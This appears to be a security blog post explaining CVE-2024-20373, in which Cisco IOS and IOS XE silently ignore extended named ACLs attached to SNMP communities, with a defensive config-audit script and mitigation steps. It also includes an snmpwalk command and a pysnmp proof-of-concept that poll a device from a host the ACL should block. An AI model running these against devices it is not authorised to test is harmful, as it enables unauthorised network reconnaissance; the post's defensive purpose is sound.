On June 5, 2024, Cisco publicly disclosed CVE-2024-20373, a vulnerability in the SNMP feature of its IOS and IOS XE software. The flaw lets a remote attacker poll SNMP on an affected router or switch even when the device is configured to deny that traffic. "Unauthenticated" here means the attacker needs no login to the device; a valid SNMP community string or SNMPv3 credentials are still required. If you manage Cisco infrastructure, understanding and mitigating this issue is critical to your network's security.
In this long-read post, we’ll break down the vulnerability in plain English, explain how attackers can leverage it, and walk through what you can do to protect your environment—complete with code examples and references to Cisco’s official documentation.
In Plain English: What’s the Problem?
Simple Network Management Protocol (SNMP) lets admins monitor and manage network gear. To limit who may query it, you attach an Access Control List (ACL) to the SNMP configuration; the ACL is supposed to permit or deny management traffic based on the source IP address of the request.
With CVE-2024-20373, an attacker can bypass that ACL, but only when the ACL is of one specific kind.
The issue centers around IPv4 extended named ACLs. Cisco IOS and IOS XE accept an extended named IPv4 ACL on the SNMP server configuration, but SNMP does not actually support that ACL type. The software does not reject the command or warn you about the misconfiguration. The result: source-address filtering is silently disabled for the community (or other SNMP object) the ACL is attached to.
Key details
- The attack is nothing more than ordinary SNMP polling from a source address the ACL should have blocked; no special packets are involved.
- The attacker can remotely read ("poll") SNMP only if they hold a valid SNMP community string or SNMPv3 credentials.
- Only extended named IPv4 ACLs are affected. Standard ACLs attached to SNMP are enforced as expected.
What Makes This Serious?
Many companies set up SNMP ACLs to lock down which remote hosts can monitor sensitive device status, routing tables, interface stats, and more. If those controls silently disappear, a remote attacker with a leaked or guessed SNMP community string can gain powerful insight into your network’s devices—even if your config should have blocked them.
Let's look at a typical (but vulnerable) configuration:
ip access-list extended SNMP-ACL
 permit udp host 192.0.2.10 any eq snmp
 deny ip any any
snmp-server community public RO SNMP-ACL
This looks like it restricts SNMP polling to 192.0.2.10 and denies everyone else. But here's the catch: IOS and IOS XE don't support extended ACLs for SNMP. When an ip access-list extended ... is attached here, the ACL is silently not applied, so the community is effectively reachable from any source address (as long as the attacker knows the community string).
You must use a *standard* IPv4 ACL (numbered, or a named one created with ip access-list standard):
access-list 10 permit 192.0.2.10
snmp-server community public RO 10
This configuration is enforced: only 192.0.2.10 can poll SNMP with the community public.
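Finding the vulnerable pattern by hand across a fleet is error-prone, because the ACL name on the snmp-server community line tells you nothing about the ACL's type; you have to cross-reference it against the ip access-list definitions. The following Python audit script is an added example, not code from the original post or from Cisco. It parses a saved running-config, classifies every ACL as standard or extended, and reports each community whose ACL is extended (the CVE-2024-20373 pattern), undefined, or missing. The SAMPLE_CONFIG is constructed for illustration; run it against show running-config output from your own devices instead.

```python
import re
from typing import Dict, Optional, Tuple

# Constructed sample running-config (not captured from a real device). It mixes
# the vulnerable extended named ACL with the supported standard forms, plus two
# other cases an auditor wants flagged.
SAMPLE_CONFIG = """\
!
ip access-list extended SNMP-ACL
 permit udp host 192.0.2.10 any eq snmp
 deny ip any any
!
ip access-list standard SNMP-STD
 permit 192.0.2.10
!
access-list 10 permit 192.0.2.10
!
snmp-server community public RO SNMP-ACL
snmp-server community monitor view cutdown RO SNMP-STD
snmp-server community legacy RO 10
snmp-server community wideopen RO
snmp-server community ghost RW NOT-DEFINED
!
"""


def collect_acls(config: str) -> Dict[str, str]:
    """Map every ACL name or number defined in the config to 'standard' or 'extended'."""
    acls: Dict[str, str] = {}
    for raw in config.splitlines():
        line = raw.strip()
        named = re.match(r"^ip access-list (standard|extended) (\S+)", line)
        if named:
            acls[named.group(2)] = named.group(1)
            continue
        numbered = re.match(r"^access-list (\d+) ", line)
        if numbered:
            num = int(numbered.group(1))
            # IOS numbered ranges: 1-99 and 1300-1999 are standard IP ACLs,
            # 100-199 and 2000-2699 are extended IP ACLs.
            standard = 1 <= num <= 99 or 1300 <= num <= 1999
            acls[numbered.group(1)] = "standard" if standard else "extended"
    return acls


def snmp_community_acl(line: str) -> Optional[Tuple[str, Optional[str]]]:
    """Parse one 'snmp-server community' line into (community, ipv4_acl_or_None)."""
    tokens = line.split()
    if tokens[:2] != ["snmp-server", "community"] or len(tokens) < 3:
        return None
    community = tokens[2]
    rest = tokens[3:]
    acl = None
    i = 0
    while i < len(rest):
        tok = rest[i]
        if tok.lower() in ("view", "ipv6"):   # 'view NAME' and 'ipv6 NACL' take an argument
            i += 2
            continue
        if tok.upper() in ("RO", "RW"):       # access mode keyword
            i += 1
            continue
        acl = tok                             # the only other positional token is the IPv4 ACL
        i += 1
    return community, acl


def audit_snmp_acls(config: str) -> Dict[str, str]:
    """Return a verdict per community: OK, EXTENDED-ACL-BYPASS, ACL-UNDEFINED or NO-ACL."""
    acls = collect_acls(config)
    verdicts: Dict[str, str] = {}
    for raw in config.splitlines():
        parsed = snmp_community_acl(raw.strip())
        if parsed is None:
            continue
        community, acl = parsed
        if acl is None:
            verdicts[community] = "NO-ACL"                 # no source filtering at all
        elif acl not in acls:
            verdicts[community] = "ACL-UNDEFINED"          # referenced ACL missing; verify on the device
        elif acls[acl] == "extended":
            verdicts[community] = "EXTENDED-ACL-BYPASS"    # the CVE-2024-20373 pattern
        else:
            verdicts[community] = "OK"
    return verdicts


if __name__ == "__main__":
    for community, verdict in audit_snmp_acls(SAMPLE_CONFIG).items():
        print(f"{verdict:22} community={community}")
```

Running it on the sample flags public (extended named ACL), wideopen (no ACL) and ghost (ACL referenced but never defined), while monitor (named standard) and legacy (numbered standard) pass. Feed it the output of show running-config | section snmp-server|access-list from each device, and treat every EXTENDED-ACL-BYPASS line as a community that is reachable from anywhere the device is reachable.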
How an attack plays out
- The attacker discovers (or guesses) a reachable Cisco device running IOS or IOS XE with an extended named IPv4 ACL attached to snmp-server community.
- The attacker holds a valid community string or SNMPv3 credentials, whether leaked, guessed, or a default that was never changed.
- The attacker polls the device from any source address. The ACL that should have dropped the request is never applied, so the device answers.
Here's a sample attack using the snmpwalk tool, run from a host that is *not* in the permitted range:
snmpwalk -v2c -c public 203.0.113.1 sysDescr
If public is valid and the device is vulnerable (an extended ACL is attached), the attacker receives the device's SNMP data even though their IP is not in the allowed range. On a device where the ACL is enforced, the same command from an unauthorized host times out with no response, because the device silently drops the request.
Proof-of-Concept
Below is a simple proof-of-concept script using Python and the pysnmp library (the synchronous hlapi of pysnmp 4.x) that attempts to poll a device. Run it from a host the ACL should block: a response means the access control is not being applied.
from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                          ContextData, ObjectType, ObjectIdentity, nextCmd)

target_ip = '203.0.113.1'   # device under test (documentation address)
community = 'public'        # community string the attacker already knows

# Walk the sysDescr subtree over SNMPv2c. With lexicographicMode=False the
# walk stops as soon as it leaves that subtree, so a vulnerable device returns
# exactly one varbind (sysDescr.0).
for (errorIndication, errorStatus, errorIndex, varBinds) in nextCmd(
        SnmpEngine(),
        CommunityData(community, mpModel=1),          # mpModel=1 selects SNMPv2c
        UdpTransportTarget((target_ip, 161), timeout=2, retries=1),
        ContextData(),
        ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr')),
        lexicographicMode=False):
    if errorIndication:
        # A timeout from a blocked host is the expected result on a fixed
        # device; it can also be a network problem, so print the reason.
        print('No data:', errorIndication)
        break
    if errorStatus:
        print('SNMP error: %s at %s' % (errorStatus.prettyPrint(), errorIndex))
        break
    for varBind in varBinds:
        # Any output here from a host outside the ACL means the ACL was bypassed.
        print(' = '.join([x.prettyPrint() for x in varBind]))
Mitigation and Hardening
Fix the ACL type now:
Replace every extended named ACL attached to SNMP with a standard ACL (numbered or named). This is a configuration change you can make immediately, without waiting for a maintenance window for a software upgrade, and it restores source-address filtering for that community.
Upgrade IOS or IOS XE:
Cisco has released fixed software. Review the official advisory for the fixed release that applies to your platform and train.
SNMPv3 encouraged, with a caveat:
Use SNMPv3 wherever possible; it requires explicit per-user credentials and supports authentication and encryption. It raises the bar for an attacker who would otherwise only need a community string, but it does not restore a bypassed ACL, so the ACL type still has to be fixed. Likewise, retire default community strings such as the public used in the examples above.
Further Reading & Official References
- Cisco Security Advisory for CVE-2024-20373
- Cisco Documentation: SNMP Community Strings
- Cisco Access Lists Explained
- Common SNMP Tools
Summary
CVE-2024-20373 opens a security gap by letting SNMP queries through ACLs that *should* block them, putting your network at risk.
Replace extended named ACLs on SNMP with standard ones today, and update your software as soon as possible.
Stay safe—because security should never depend on “silent misconfigurations.”
*This post is an exclusive, plain-English breakdown tailored for network admins, blue teams, and interested security professionals. For questions, explore the official Cisco advisory or start a conversation in public tech forums!*
Timeline
Published on: 11/15/2024 15:15:06 UTC